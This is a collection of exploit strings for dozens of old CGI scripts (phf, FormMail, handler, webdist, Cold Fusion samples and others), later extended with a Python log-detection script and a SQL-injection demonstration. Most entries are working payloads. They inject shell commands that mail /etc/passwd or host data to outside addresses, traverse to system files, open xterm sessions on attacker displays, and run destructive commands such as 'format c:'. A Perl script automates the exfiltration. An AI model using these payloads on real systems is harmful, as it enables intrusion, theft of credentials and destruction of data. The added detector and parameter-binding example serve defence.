CGI-Hole (by putois)

AT-generate.cgi

<html><head><title>exploit</title></head>
<body>
<p><FORM ACTION="http://EWS.SERVER.COM/cgi-bin/AT-generate.cgi" METHOD=POST>
<INPUT TYPE="hidden" NAME="db" VALUE="personal">
<INPUT TYPE="submit" NAME="Reload" VALUE="Reload">
Reload this page, in case the log file or status has changed.
<INPUT TYPE="hidden" NAME="Dump" VALUE="dummy">
<INPUT TYPE="hidden" NAME="File" VALUE="/usr/local/etc/excite/collections/AT-personal.prog">
<INPUT TYPE="hidden" NAME="Type" VALUE="progress">
<INPUT TYPE="hidden" NAME="ENCRYPTEDPASS" VALUE="ENCRYPTEDPASS">
</FORM><BR>
</body>
</html>

anyform.cgi

<input type="hidden" name="AnyFormTo" value="foo@bar.com;cmd-to execute with whatever arguments;/usr/lib/sendmail -t foo@bar.com">

aglimpse (telnet 80)

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\@i.am\</etc/passwd;eval$CMD;echo HTTP/1.0

bnbform.cgi

<FORM METHOD="POST" ACTION="http://www.victim.com/cgi-bin/bnbform.cgi">
FIELDS MARKED WITH * ARE REQUIRED!
Your Name:*
<INPUT TYPE="TEXT" NAME="name" SIZE=35 MAXLENGTH=50>
<!-- SCRIPT CONFIGURATION SECTION -->
<INPUT TYPE="HIDDEN" NAME="autorespond" VALUE="yes">
<INPUT TYPE="HIDDEN" NAME="automessage" VALUE="/etc/passwd">
<INPUT TYPE="HIDDEN" NAME="ok_url" VALUE="http://127.0.0.1/thanks.html">
<INPUT TYPE="HIDDEN" NAME="not_ok_url" VALUE="http://127.0.0.1/oops.html">
</FORM>

campas (telnet 80)

GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a

carbo

http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

cgimail.exe (nt)

<form action="/scripts/CGImail.exe" method="POST" NAME="TestForm">
<input type=hidden name="$File$" value="/scripts/template.txt">
<input type=hidden name="$Subject$" value="CGImail Example">
<input type=hidden name="$LocationOK$" value="/ok.html">
<input type=hidden name="$LocationKO$" value="/ko.html">
<input type=hidden name="$To$" value="mnemonix@globalnet.co.uk">
<input type=hidden name="$Optional$" value="mmmh, no!">
</form>

classifieds.cgi

<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="duke@viper.net.au">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?
</form>

count.cgi

http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../path/file.gif

dumpenv.pl

http://www.site.net/cgi-bin/dumpenv.pl?/session/adminlogin?RCpage=/sysadmin/index.stm
http://www.site.net/c:/program files/sambar41

environ.cgi (telnet 80)

/cgi-bin/environ.cgi HTTP/1.1" 200 2034

files.pl

http://netware.nmrc.org/perl/files.pl?file=sys:system/autoexec.ncf
http://netware.nmrc.org/perl/files.pl?file=sys:etc/ldremote.ncf
http://netware.nmrc.org/perl/files.pl?file=vol2:apps/accounting/payroll.doc

faxsurvey

http://linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

FormMail

<html><head><title>hack</title></head>
<body><form method="post" action="http://www.clueless-sysadmin.se/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="ugh@hotmail.com; cat /etc/passwd | mail ugh@hotmail.com">
<input type="submit" name="submit" value="submit">
</form></body></html>

guestbook

/cgi-bin/wguest.exe?template=c:\boot.ini
/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf

handler (telnet 80)

GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
-> press the Tab key after cat

GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
/cgi-bin/handler/whatever;cat\t/etc/passwd\|\t
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download

htmlscript

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

httpd (telnet 80)

GET / HTTP/1.0" 404 -9999999 "

info2www

REQUEST_METHOD=GET ./info2www '(../../../../bin/mail user_name </etc/passwd|)'

nph-test-cgi (test-cgi)

just that:
/cgi-bin/nph-test.cgi /*
/cgi-bin/nph-test.cgi /*etc/*
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

note: only with netscape 3 on windows

nph-publish

HTTP/1.0 400
Request method must be PUT to call this script!
PUT /../index.html HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/3.01Gold (Win95; I)
Host: 127.0.0.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Length: 666

perl.exe

http://myhost.com/cgi-bin/perl.exe?-e?'format?c:'
http://host.com/cgi-bin/perl.exe?-e?'format%20c:'
http://www.target.com/cgi-bin/perl.exe?&-e+unlink+%3C*%3E

pfdispaly.cgi

lynx -source 'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/
$lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

phf

/cgi-bin/phf?Qname=%0Acat%20/etc/passwd
/cgi-bin/phf?Qname=%0Acd%20/%0als
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

php.cgi

http://boogered.system.com/cgi-bin/php.cgi?/file/to/view

Quid Pro Quo (mac os)

http://site.name/server%20logfile

s97_cgi

http://www.xxx.com/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/passwd&ResultStyle=simple&ResultCount=20&collection=books

survey.cgi

<FORM METHOD="POST" ACTION="http://www.victim.com/cgi-bin/survey.cgi">
<input type=hidden name=action value="VOTE">
<input type=hidden name=filebase value="bleh; /bin/mail you@your_email_address.com">
<PRE>
Your Gender
<input type=radio name=ITEM1 value="0">Male
<input type=radio name=ITEM1 value="1">Female
<input type=radio name=ITEM1 value="2">Neuter
<INPUT TYPE="submit" VALUE="VOTE!">
</PRE>
</FORM>

start

/cgi-bin/start?curmbox=ACTIVE&js=no&login

textcounter

#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _modify_ this
if ($ARGV[0]) {
$CMD=$ARGV[0];
}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
system({"lynx"} "lynx", $text);
system({"lynx"} "lynx", $text);

uploader.exe

<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="/cgi-win/uploader.exe/Uploads/">
<PRE>Your name: <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)
Email address: <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)
<b>NOTE:</b>
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>
File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</PRE>
</FORM>

<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">
<INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">
<INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com">
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>
<INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</FORM>

view-source

http://hack.com/cgi-bin/view-source?../../../../../../../etc/passwd

webdist

http://host.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://host/cgi-bin/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh

* also applies to: wrap.cgi, handler.cgi, day5datacopier.cgi, day5notifier.cgi

http://victim/cgi-bin/wrap/blah;/tmp/myscript
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
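Nearly every entry in this list rides on one of a few request-level patterns: a shell metacharacter or an encoded newline (%0a) smuggled into a CGI argument (phf, campas, handler, webdist, whois_raw), a ../ traversal (Count.cgi, htmlscript, view-source, wrap), or a request for a script name known from this list. As an added detection example that is not part of the original list, the Python below tags Apache common-log lines by those classes; the script-name set and the sample log lines are constructed here, not taken from the page.

```python
import re
from urllib.parse import unquote_plus
# Basenames of the scripts listed on this page (case-insensitive match).
KNOWN_VULN_SCRIPTS = {
    "phf", "test-cgi", "nph-test-cgi", "handler", "campas", "aglimpse", "webdist.cgi",
    "htmlscript", "view-source", "whois_raw.cgi", "formmail.pl", "php.cgi", "faxsurvey",
    "webgais", "websendmail", "wrap", "pfdispaly.cgi", "count.cgi", "info2www", "perl.exe",
}
SHELL_META = re.compile(r"[;|`\n]|\bIFS=")   # ; | ` newline (%0a) and the IFS trick
TRAVERSAL = re.compile(r"\.\.[/\\]")          # ../ or ..\ segments
SENSITIVE = re.compile(r"/etc/passwd|boot\.ini|\$winnt\$\.inf|\.htaccess", re.I)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+)[^"]*" (?P<status>\d{3})')  # Apache common log

def classify(target):
    """Return the attack classes matched by one request target (path?query)."""
    decoded = unquote_plus(target)             # %0a -> newline, %20 and + -> space
    path = decoded.split("?", 1)[0]
    tags = []
    # Any path segment naming a listed script, e.g. /cgi-bin/handler/whatever;cat ...
    if any(seg.lower() in KNOWN_VULN_SCRIPTS for seg in path.split("/")):
        tags.append("known-vuln-script")
    if SHELL_META.search(decoded):
        tags.append("shell-metachar")
    if TRAVERSAL.search(decoded):
        tags.append("path-traversal")
    if SENSITIVE.search(decoded):
        tags.append("sensitive-file")
    return tags

def scan(log_text):
    """Return one alert dict per request in common-log text that matches a class."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m["target"])):
            alerts.append({"ip": m["ip"], "target": m["target"],
                           "status": int(m["status"]), "tags": tags})
    return alerts
# Constructed sample log lines: three mirror entries from this page, one is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/1998:13:55:36 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1043
10.0.0.5 - - [10/Oct/1998:13:56:01 +0000] "GET /cgi-bin/Count.cgi?display=image&image=../../path/file.gif HTTP/1.0" 200 512
10.0.0.7 - - [10/Oct/1998:13:57:12 +0000] "GET /cgi-bin/handler/whatever;cat%20/etc/passwd|?data=Download HTTP/1.0" 200 2034
192.168.1.9 - - [10/Oct/1998:14:01:05 +0000] "GET /cgi-bin/search.cgi?q=apples+and+pears HTTP/1.0" 200 800
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["ip"], a["status"], ",".join(a["tags"]), a["target"])
```

The semicolon and pipe checks also fire on legitimate session-id or filter syntax in some applications, so treat the tags as triage hints and tune the sets per site; a 200 status on a tagged request is the line worth reading first.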

webgais

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 80 (replace this with the actual length of the "exploit" line)
query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph

websendmail

telnet target.machine.com 80
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=97)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a &rtnaddr=a&subject=a&content=a

websites

http://website.host/cgi-dos/args.cmd?"&any+dos+command"
http://website.host/cgi-dos/args.bat?"&any+dos+command"

(winnt version)

(win95 version)

webstart

http://your.site/WebSTAR%20LOG

wwwboard.pl

<form method=POST action="http://some.poor.host/cgi-bin/wwwboard.pl">
<input type=hidden name="followup" value="1,2,3,4,5,|.|">
<input type=submit value="Clobber web board">
</form>

whois_raw

/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

www-msql

http://www.thegnome.com/secure/.htaccess
http://www.thegnome.com/secure/.wwwacl
http://your.server/cgi-bin/www-sql/protected/something.html

Cold Fusion

http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt
http://www.server.com/cfdocs/expeval/kdg.cfm?DirPath=C%3A%5Cinetpub%5Cwwwroot%5C
http://www.server.com//cfdocs/expeval/sendmail.cfm?MailFrom=&MailTo=&Subject=&Message=
http://server/cfdocs/snippets/fileexists.cfm?..\..\..\..\boot.ini
http://server/cfdocs/snippets/gettempdirectory.cfm
http://server/cfdocs/snippets/viewexample.cfm?Tagname=..\..\

FrontPage

<!--webbot BOT="GeneratedScript" endspan -->
<form method="POST" action="../_vti_bin/shtml.dll/downloads/ftp.html" name="FrontPage_Form1" webbot-action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults"
u-file="d:\us\product_downloads\download_log.csv"
s-format="TEXT/CSV" s-label-fields="FALSE" s-builtin-fields="Date Time"
s-form-fields u-confirmation-url="../_confirmations/ftp.html"
startspan -->

<!--webbot bot="SaveResults"
u-file="/_private/download.log"
s-format="TEXT/TEXT" s-form-fields startspan -->

/scripts/iisadmin/bdir.htr??<path>
/scripts/iisadmin/bdir.htr??d:\webs\
http://site/iissamples/exair/howitworks/codebrws.asp?source=/../../boot.ini

websql

<% SQLquery="SELECT * FROM phonetable"
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.Open "DSN=websql;UID=sa;PWD=pwd;DATABASE=master"
Set rec = Server.CreateObject("ADODB.RecordSet")
rec.ActiveConnection=Conn
rec.Open SQLquery %>

<% SQLquery="SELECT * FROM phonetable WHERE name='" & _
request.querystring("name") & "'"
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.Open "DSN=websql;UID=sa;PWD=pwd;DATABASE=master"
Set rec = Server.CreateObject("ADODB.RecordSet")
rec.ActiveConnection=Conn
rec.Open SQLquery %>
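The second websql snippet splices request.querystring("name") straight into the SQL text, so the structure of the statement depends on what the client sent. As an added example that is not part of the original page, the same lookup is written in Python with sqlite3 both ways (the phonetable rows and the input O'Brien are constructed here): a quote in the name breaks the concatenated statement, while the bound parameter is handled purely as data.

```python
import sqlite3

def build_unsafe_query(name):
    """Mirror of the ASP snippet: the request value becomes part of the SQL text."""
    return "SELECT * FROM phonetable WHERE name='" + name + "'"

def lookup_unsafe(conn, name):
    # Whatever the client sends is parsed by the database as SQL.
    return conn.execute(build_unsafe_query(name)).fetchall()

def lookup_safe(conn, name):
    # Placeholder binding: the SQL text is fixed, the value travels separately.
    return conn.execute("SELECT * FROM phonetable WHERE name=?", (name,)).fetchall()

def make_db():
    """Constructed in-memory phonetable standing in for the page's DSN=websql database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phonetable (name TEXT, phone TEXT)")
    conn.executemany("INSERT INTO phonetable VALUES (?, ?)",
                     [("alice", "555-0100"), ("O'Brien", "555-0199")])
    return conn

def demo(name):
    """Return (unsafe result or error text, safe result) for one request value."""
    conn = make_db()
    try:
        unsafe = lookup_unsafe(conn, name)
    except sqlite3.OperationalError as exc:       # the quote turned data into syntax
        unsafe = "error: " + str(exc)
    return unsafe, lookup_safe(conn, name)

if __name__ == "__main__":
    for value in ("alice", "O'Brien"):
        unsafe, safe = demo(value)
        print(repr(value), "| concatenated:", unsafe, "| bound:", safe)
```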